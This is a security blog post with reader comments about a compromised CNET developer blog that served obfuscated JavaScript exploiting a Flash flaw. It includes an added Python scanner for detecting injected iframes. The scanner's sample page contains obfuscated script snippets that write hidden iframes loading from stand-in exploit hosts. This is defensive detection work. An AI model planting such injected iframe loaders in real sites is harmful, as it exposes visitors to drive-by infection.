CNET's Clientside developer blog serving Adobe Flash exploits

Yesterday, Websense Labs issued an alert regarding a compromised CNET blog, namely the Clientside developer blog, which had been embedded with malicious JavaScript code attempting to exploit visitors through a well-known vulnerability in Adobe's Flash Player. Websense's alert:

"Websense Security Labs ThreatSeeker Network has discovered that a CNET Networks site has been compromised. The main page of the CNET Clientside Developer Blog contains malicious JavaScript code that de-obfuscates into an iframe that loads its primary malicious payload from a different host. The malicious code is observed to exploit a known integer overflow vulnerability in Adobe Flash (CVE-2007-0071). At the time of this alert, the site is still hosting the malicious code. Visitors who are not patched against this vulnerability will be infected without any user interaction."

Interestingly, the second JavaScript obfuscation that they analyzed at the time of detection is different from the one I managed to obtain from a copy of the blog on the 2nd of August. While it remains unknown for how long the blog had been embedded with the JavaScript, this malware attack, and the rotating scripts in particular, indicate a compromise of the site itself rather than one of the massive SQL injections we're seeing on a daily basis. The embedded JavaScript code appears to have been removed. Once deobfuscated, the JavaScript attempts to access the live exploit URL on a .info domain that is now down. Historically, the same domain has been used in blackhat search engine optimization campaigns: yet another example of underground multitasking, namely abusing a single domain for several different fraudulent purposes.
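The mechanism Websense describes above (an obfuscated inline script that decodes into an iframe loading its payload from a different host) is something a site operator can check for in their own pages. The following Python scanner is an added example, not code from this post, from Websense or from CNET: it statically expands the common unescape() and String.fromCharCode() idioms without executing any page content, then flags iframes that point at a host other than the page's own and are either hidden or came out of decoded script. The sample page, the host names (blogs.example, exploit-host.example, ads.example) and the obfuscated snippets in it are constructed for this example.

```python
"""Scan a page's HTML for injected, obfuscated scripts that decode into
third-party iframes. Added example, not the article's or Websense's code.
Decoding is purely static (regular expressions); nothing is executed."""
import re
from urllib.parse import urlparse, unquote

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
SRC_RE = re.compile(r"src\s*=\s*['\"]?([^'\"\s>]+)", re.I)
UNESCAPE_RE = re.compile(r"unescape\(\s*['\"]([^'\"]*)['\"]\s*\)", re.I)
FROMCHARCODE_RE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)", re.I)
JS_UNICODE_RE = re.compile(r"%u([0-9a-fA-F]{4})")  # JS unescape() also takes %uXXXX


def static_decode(script_body: str, max_rounds: int = 5) -> str:
    """Expand unescape('...') and String.fromCharCode(...) literals in place.
    Runs a few rounds because injected code is often wrapped in more than
    one layer; stops as soon as a round changes nothing."""
    text = script_body
    for _ in range(max_rounds):
        previous = text
        text = UNESCAPE_RE.sub(
            lambda m: unquote(JS_UNICODE_RE.sub(lambda u: chr(int(u.group(1), 16)), m.group(1))),
            text)
        text = FROMCHARCODE_RE.sub(
            lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()),
            text)
        if text == previous:
            break
    return text


def is_hidden(attrs: str) -> bool:
    """Zero-sized or CSS-hidden frames are the usual shape of a drive-by iframe."""
    a = attrs.lower().replace(" ", "")
    return bool(re.search(r"(width|height)=['\"]?0(?![\d.])", a)
                or "display:none" in a or "visibility:hidden" in a)


def iframe_hosts(fragment: str, page_host: str):
    """Yield (host, hidden) for every iframe tag in the fragment; a relative
    src is attributed to the page's own host."""
    for attrs in IFRAME_RE.findall(fragment):
        m = SRC_RE.search(attrs)
        src = m.group(1) if m else ""
        yield (urlparse(src).hostname or page_host), is_hidden(attrs)


def scan_page(page_html: str, page_host: str):
    """Return iframes that load from another host and are hidden or were
    produced by decoding an obfuscated script, in document order."""
    findings = []
    for script in SCRIPT_RE.findall(page_html):
        decoded = static_decode(script)
        obfuscated = decoded != script
        for host, hidden in iframe_hosts(decoded, page_host):
            if host != page_host and (hidden or obfuscated):
                findings.append({"host": host, "hidden": hidden, "obfuscated": obfuscated})
    # Plain iframes in the markup (script bodies removed to avoid double counting).
    for host, hidden in iframe_hosts(SCRIPT_RE.sub("", page_html), page_host):
        if host != page_host and hidden:
            findings.append({"host": host, "hidden": hidden, "obfuscated": False})
    return findings


# Constructed sample page: two injected scripts (percent-escaped and
# fromCharCode) plus one legitimate same-origin iframe. All hosts are fictitious.
SAMPLE_PAGE = """<html><head><title>Developer blog (constructed sample)</title></head>
<body><h1>Latest post</h1>
<script type="text/javascript">
document.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2Fexploit-host.example%2Fin.cgi%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E'));
</script>
<script>var s=String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,97,100,115,46,101,120,97,109,112,108,101,47,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,34,62);</script>
<iframe src="/widgets/comments.html" width="600" height="400"></iframe>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_page(SAMPLE_PAGE, "blogs.example"):
        print(finding)
```

Run against the sample, the scanner reports the two decoded frames (exploit-host.example and ads.example, both hidden and both from obfuscated script) and ignores the legitimate same-origin comments frame. The static decoder only covers the two idioms shown; script that builds its payload arithmetically will pass through unchanged, so a hit means "investigate", and a miss does not mean "clean".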

This malware attack should not be treated as an isolated event; it's the result of today's major risk-forwarding process, in which legitimate sites are serving malware and exploits at an unprecedented rate. Multiple vendors confirm the trend: in its latest report, ScanSafe reports a 407 percent increase in compromises of legitimate websites, Sophos finds that a full 79% of malware-hosting Web sites are legitimate ones, and Websense states that more than 75 percent of the Web sites it classified as malicious were actually legitimate ones.

Slowly, but inevitably, the "do not visit unknown and potentially harmful sites" security tip is starting to lose its charm.

Dancho Danchev

About Dancho Danchev

Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, malware and cybercrime incident response.

Talkback

5 comments
  • It's why Protected Mode (and AppArmor) are better than NoScript

    [i]Slowly, but inevitably, the "do not visit unknown and potentially harmful sites" security tip is starting to lose its charm.[/i]

    Don't get me wrong, I use NoScript but it fails this test. The instant you "trust" a site and turn on scripting, you could be vulnerable.

    NoScript is a good layer of defense but people are mistaken when they say that Firefox + NoScript is a security panacea. Come on Mozilla, Vista users need a Protected Mode capable Firefox.
    NonZealot
    • It's why Protected Mode (and AppArmor) are better than NoScript

      @NonZealot:

      Telling NoScript that you trust one site does not tell it to trust all scripts served through a site's Web page. If the script comes from a different server, you will be prompted to approve that, even if you have already approved the site hosting the page you're viewing.

      So even if a user would have automatically approved the malicious script on CNET, all subsequent scripts would have to be approved manually. Of course, I'll grant you that users might approve each script blindly, but NoScript doesn't make it easy to do that.

      I'm not arguing that NoScript would be the perfect solution, just pointing out that it doesn't work quite the way you describe.

      According to http://msdn.microsoft.com/en-us/library/bb250462.aspx:
      [i]The Windows Vista security infrastructure allows Protected Mode to provide Internet Explorer with the privileges needed to browse the Web while withholding privileges needed to silently install programs or modify sensitive system data.[/i]

      Seems to me that Firefox with NoScript meets that description, although it might be easier for the user to override the NoScript protection than the Protected Mode protection. But that override would take distinct effort on the part of the user, either by turning off NoScript or clicking on the Options button and allowing 101.202.303.404, for instance, to run a script.

      If I'm wrong about any of this, I'd love to discuss it.

      -- Tim
      TimothyMcGowan
      • You are correct, it depends on the circumstances

        [i]Telling NoScript that you trust one site does not tell it to trust all scripts served through a site's Web page.[/i]

        You are right. It would depend on if the javascript in question was linked from the trusted page (NoScript would block this) or if it was embedded into the page (NoScript wouldn't block it).

        [i]Seems to me that Firefox with NoScript meets that description[/i]

        This I disagree with. NoScript actually disables the javascript engine for untrusted sources so the javascript doesn't run at all. Protected Mode (and AppArmor) allow the javascript to run but with greatly reduced permissions. NoScript doesn't trust [b]any[/b] javascript, even if it is harmless. Protected Mode allows javascript to run but denies access to anything that the script shouldn't be messing with.

        The disadvantage of NoScript is that it stops even legitimate javascript from running. Protected Mode (and AppArmor) allows legitimate javascript to run. Both fail the scenario where you get attacked by a "trusted site" but because NoScript disables even legitimate javascript, you are much more likely to turn NoScript off than Protected Mode for a certain site.

        NoScript is like the gate of a gated community where there are no locks on the houses. Don't trust the mailman? Fine, you get no mail. Trust the mailman? Nothing stops him from walking into your house and stealing your stuff. Protected Mode is like a normal community. Anyone can put stuff in your mailbox but they can't get into your house.

        I'll continue to use NoScript even if Firefox gets Protected Mode since they both live quite happily together! People in gated communities can still lock their doors. :)
        NonZealot
  • RE: CNET's Clientside developer blog serving Adobe Flash exploits

    spybot just blocked a suspicious file from being downloaded from THIS page!
    Allesmachine
  • RE: CNET's Clientside developer blog serving Adobe Flash exploits

    Guess what, guys. Your article on the Olympics breaking the internet is also serving them.
    Hates Idiots